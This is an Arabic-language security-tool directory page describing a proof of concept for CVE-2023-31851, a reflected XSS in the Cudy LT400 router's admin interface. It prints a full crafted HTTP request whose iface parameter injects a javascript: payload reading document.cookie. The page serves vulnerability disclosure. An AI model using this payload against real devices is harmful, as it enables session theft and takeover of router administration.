Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-31851 — إثبات مفهوم لـ XSS المنعكس في واجهة الويب Cudy LT400، مما يتيح سرقة رمز الجلسة عبر طلبات مبنية بدون مصادقة إلى /cgi-bin/luci/admin/network/wireless/status. | Kitploit
أدوات/GitHubGitHub/calfcrusher/cve-2023-31851
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubcalfcrusher/cve-2023-31851

CVE-2023-31851

إثبات مفهوم لـ XSS المنعكس في واجهة الويب Cudy LT400، مما يتيح سرقة رمز الجلسة عبر طلبات مبنية بدون مصادقة إلى /cgi-bin/luci/admin/network/wireless/status.

عرض المستودع
منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-31851

هجوم البرمجة النصية عبر المواقع (XSS) المنعكس موجود في واجهة الإدارة المستندة إلى الويب لجهاز Cudy LT400.

تحتوي الصفحة /cgi-bin/luci/admin/network/wireless/status على XSS منعكس عبر المعامل iface.

تتضمن طرق الاستغلال إرسال طلب مخصّص للضحية يحتوي على تعليمات برمجية خبيثة.

لا يقوم التطبيق المتأثر بتعيين Session Cookie مع السمة HttpOnly؛ مما قد يؤدي إلى الاستيلاء على صلاحيات المشرف عبر سرقة رمز الجلسة.

إصدارات البرامج الثابتة المعرّضة للخطر: 1.13.4 - 1.15.18 - 1.15.27

PoC

root@kitploit:~
GET /cgi-bin/luci/admin/network/wireless/status?iface=wlan00%22%29%27%20href%3D%22javascript%3Aalert%28document.cookie%29%3B%22%3Exss%3C%2Fa%3E HTTP/1.1
Host: 172.16.1.1
User-Agent: Mozilla/5.0
Accept: text/html, */*; q=0.01
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://172.16.1.1/cgi-bin/luci/
Cookie: sysauth=REDACTED

المورد

Shenzhen Cudy Technology

مرجع CVE

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-31851

مرجع المنتج

https://www.cudy.com

تنزيل الأداة